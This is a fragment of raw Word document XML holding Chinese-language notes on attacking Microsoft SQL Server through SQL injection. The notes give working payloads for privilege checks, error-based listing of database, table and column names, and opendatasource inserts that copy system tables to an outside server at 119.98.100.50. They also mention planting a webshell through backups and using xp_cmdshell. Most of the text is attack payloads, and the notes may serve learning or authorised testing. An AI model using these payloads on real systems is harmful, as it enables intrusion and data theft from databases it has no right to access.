          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:ind w:firstLineChars="0"/>
        <w:outlineLvl w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="25" w:name="_Toc468296488"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>针对</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数据库的攻击</w:t>
      </w:r>
      <w:bookmarkEnd w:id="25"/>
    </w:p>
    <w:p w:rsidR="00BD6D90" w:rsidRDefault="00BD6D90" w:rsidP="00696638">
      <w:pPr>
        <w:outlineLvl w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="26" w:name="_Toc468296489"/>
      <w:r w:rsidRPr="00685793">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有错误回显的</w:t>
      </w:r>
      <w:r w:rsidRPr="00685793">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2000</w:t>
      </w:r>
      <w:bookmarkEnd w:id="26"/>
    </w:p>
    <w:p w:rsidR="002E42DC" w:rsidRPr="00CF0191" w:rsidRDefault="00CF0191" w:rsidP="006750E2">
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断权限：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0191" w:rsidRPr="00CF0191" w:rsidRDefault="00CF0191" w:rsidP="00C63B76">
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=(select is_srvrolemember('sysadmin'))</w:t>
      </w:r>
      <w:r w:rsidR="002B78C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;--</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B63B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断是否是系统管理员</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0191" w:rsidRPr="00CF0191" w:rsidRDefault="00CF0191" w:rsidP="00C63B76">
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=(select is_srvrolemember('db_owner'))</w:t>
      </w:r>
      <w:r w:rsidR="002B78C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;--</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="005B63B6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>//</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断是否是库权限</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0191" w:rsidRDefault="00CF0191" w:rsidP="00C63B76">
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=(select is_srvrolemember('public'))</w:t>
      </w:r>
      <w:r w:rsidR="002B78C9">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>;--</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">   //</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>判断是否为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>public</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF0191">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>权限</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0096152E" w:rsidRPr="00CF0191" w:rsidRDefault="0096152E" w:rsidP="00C63B76"/>
    <w:p w:rsidR="00C63B76" w:rsidRDefault="00C63B76" w:rsidP="00C63B76">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and user&gt;0  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前数据库用户名</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63B76" w:rsidRPr="00C63B76" w:rsidRDefault="00C63B76" w:rsidP="00C63B76">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and db_name&gt;0  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>获取当前数据库名称</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C63B76" w:rsidRPr="00C63B76" w:rsidRDefault="00C63B76" w:rsidP="00C63B76">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>and 1=convert(int,db_name())</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1=(select db_name())  //</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前数据库名</w:t>
      </w:r>
      <w:r w:rsidRPr="00C63B76">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF0191" w:rsidRPr="00CF0191" w:rsidRDefault="00CF0191" w:rsidP="00CF0191"/>
    <w:p w:rsidR="00FC3B00" w:rsidRPr="00D35CC2" w:rsidRDefault="00855ECA" w:rsidP="002E42DC">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Web</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>路径，可以通过差异备份或者</w:t>
      </w:r>
      <w:r w:rsidR="00713961">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>og</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>备份得到</w:t>
      </w:r>
      <w:r w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>webshell</w:t>
      </w:r>
      <w:r w:rsidR="002A7ED5" w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="002A7ED5" w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>P159</w:t>
      </w:r>
      <w:r w:rsidR="002A7ED5" w:rsidRPr="00D35CC2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00FC3B00" w:rsidRDefault="00FC3B00" w:rsidP="002E42D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有错误回显的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建表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ofoofo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sulttx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)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写表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z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z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x6900700063006f006e00660069006700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ofoofo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sulttx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ast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xp_cmdshell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z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ofoofoo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读表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cast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转换，也没感觉出来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有啥效果</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F92014" w:rsidRPr="00A57D6C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where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*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e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ofoofo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 and 1=1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读出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IP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地址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case when ...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then ...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case when ...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then ...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else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  ...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end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ultt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2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ultt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2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9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ultt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ofoofoo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define_table_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sc</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F92014" w:rsidRDefault="00F92014" w:rsidP="00F9201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删表</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00685793" w:rsidRDefault="00F92014" w:rsidP="00F92014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oofoofoo</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00355F8A" w:rsidRDefault="00355F8A" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00355F8A" w:rsidRDefault="00782178" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中不像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ACCESS</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>需要经验来猜表，如果有回显错误，我们可以一一通过</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>MSSQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中的</w:t>
      </w:r>
      <w:r w:rsidRPr="001C1EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>information_schema</w:t>
      </w:r>
      <w:r w:rsidR="004311FA" w:rsidRPr="001C1EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>.tables</w:t>
      </w:r>
      <w:r w:rsidR="004311FA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r w:rsidR="004311FA" w:rsidRPr="001C1EEA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>information_schema.columns</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>来得到所有的表名、列名和相应的内容。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00901534" w:rsidRDefault="000A3960" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到当前</w:t>
      </w:r>
      <w:r w:rsidR="00BE6862">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表的第一</w:t>
      </w:r>
      <w:r w:rsidR="00C26E9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列</w:t>
      </w:r>
      <w:r w:rsidR="003337EC">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="00C26E9D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>having 1=1</w:t>
      </w:r>
      <w:r w:rsidR="000541CA">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00901534">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00901534">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>此时当然也得到了当前表</w:t>
      </w:r>
      <w:r w:rsidR="0088636B">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的表名</w:t>
      </w:r>
      <w:r w:rsidR="00901534">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F6582D" w:rsidRPr="004311FA" w:rsidRDefault="000541CA" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到</w:t>
      </w:r>
      <w:r w:rsidR="001364EE">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前</w:t>
      </w:r>
      <w:r w:rsidR="0061095D">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>其他列：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>group by mycat.id having 1=1</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="000541CA" w:rsidRDefault="006907A2" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到第一个表</w:t>
      </w:r>
      <w:r w:rsidR="000541CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
      <w:r w:rsidR="000541CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1=convert(int,(select top 1 table_name from </w:t>
      </w:r>
      <w:r w:rsidR="000541CA" w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>information_schema.tables</w:t>
      </w:r>
      <w:r w:rsidR="000541CA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
      <w:r>
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006907A2" w:rsidRDefault="006907A2" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到第二个表：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1=convert(int,(select top 1 table_name from</w:t>
      </w:r>
      <w:r w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t xml:space="preserve"> information_schema.tables</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_name not in (Ch_sub)))</w:t>
      </w:r>
      <w:r w:rsidR="00901534">
        <w:br/>
      </w:r>
      <w:r w:rsidR="005F79E9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1569085"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="12" name="图片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74" w:rsidRDefault="00A24474" w:rsidP="002640ED">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00693AE2" w:rsidRDefault="006907A2" w:rsidP="002640ED">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到表里面的</w:t>
      </w:r>
      <w:r w:rsidR="002640ED">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006907A2" w:rsidRDefault="002640ED" w:rsidP="002640ED">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1=convert(int,(select top 1 column_name from </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>information_schema.column</w:t>
      </w:r>
      <w:r w:rsidR="0061095D" w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_name = </w:t>
      </w:r>
      <w:r w:rsidR="00BE0398">
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r w:rsidR="00BE0398">
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002640ED" w:rsidRDefault="002640ED" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到表里面的第二个列名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0398" w:rsidRDefault="00BE0398" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">1=convert(int,(select top 1 column_name from </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>information_schema.column</w:t>
      </w:r>
      <w:r w:rsidR="0061095D" w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where table_name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">=  </w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Users</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> and column_name not in (</w:t>
      </w:r>
      <w:r>
        <w:t>‘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>)))</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BE0398" w:rsidRDefault="00BE0398" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00B535EC" w:rsidRDefault="00B535EC" w:rsidP="00CB44EF"/>
    <w:p w:rsidR="00B535EC" w:rsidRDefault="00B535EC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>建表让返回的数据能够正确存入到本机搭建的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>mssql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>表中。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B535EC" w:rsidRDefault="00B535EC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>create database test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B535EC" w:rsidRDefault="00B535EC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>use test</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B535EC" w:rsidRDefault="00B535EC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>create table ku(name nvarchar(256) null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B535EC" w:rsidRPr="005D3718" w:rsidRDefault="00B535EC" w:rsidP="00CB44EF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>create table biao(id int null,name varchar(256) null)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00147058" w:rsidRDefault="00147058" w:rsidP="00147058">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到所有库名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B535EC" w:rsidRDefault="00FC0F6D" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert</w:t>
      </w:r>
      <w:r w:rsidR="00206EBF">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">into </w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>opendatasource(</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:t>‘</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqloledb</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>server=119.98.100.50:1433,uid=sa,pwd=test,database=test</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="000107FB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>) .test.dbo.ku select name from master.dbo.</w:t>
      </w:r>
      <w:r w:rsidR="000107FB" w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sysdatabases</w:t>
      </w:r>
      <w:r w:rsidR="004E68BF">
        <w:t>—</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004E68BF" w:rsidRPr="004E68BF" w:rsidRDefault="004E68BF" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5274310" cy="1430655"/>
            <wp:effectExtent l="19050" t="0" r="2540" b="0"/>
            <wp:docPr id="13" name="图片 1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3" w:rsidRDefault="00857953" w:rsidP="00CD4823">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>得到当前库的所有表名：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00857953" w:rsidRDefault="00857953" w:rsidP="00857953">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>insert into opendatasource(</w:t>
      </w:r>
      <w:r>
        <w:t>‘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>sqloledb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erver=119.98.100.50:1433,uid=sa,pwd=test,database=test</w:t>
      </w:r>
      <w:r>
        <w:t>’</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">) .test.dbo.biao select [id],[name] from </w:t>
      </w:r>
      <w:r w:rsidRPr="002E6CE1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>sysobjects</w:t>
      </w:r>
      <w:r w:rsidR="005A65D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> where xtype=</w:t>
      </w:r>
      <w:r w:rsidR="005A65D8">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="005A65D8">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>U</w:t>
      </w:r>
      <w:r w:rsidR="005A65D8">
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidR="00DD0D80">
        <w:t>—</w:t>
      </w:r>
      <w:r w:rsidR="00DD0D80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>(U</w:t>
      </w:r>
      <w:r w:rsidR="00DD0D80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>代表</w:t>
      </w:r>
      <w:r w:rsidR="00DD0D80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>User</w:t>
      </w:r>
      <w:r w:rsidR="00DD0D80">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当前用户）</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00396A12" w:rsidRDefault="00396A12" w:rsidP="00857953">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3095238" cy="3333334"/>
            <wp:effectExtent l="19050" t="0" r="0" b="0"/>
            <wp:docPr id="17" name="图片 1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当前库的所有表</w:t>
      </w:r>
      <w:r w:rsidR="00B54F98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，可以看到有个</w:t>
      </w:r>
      <w:r w:rsidR="00B54F98">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Amember</w:t>
      </w:r>
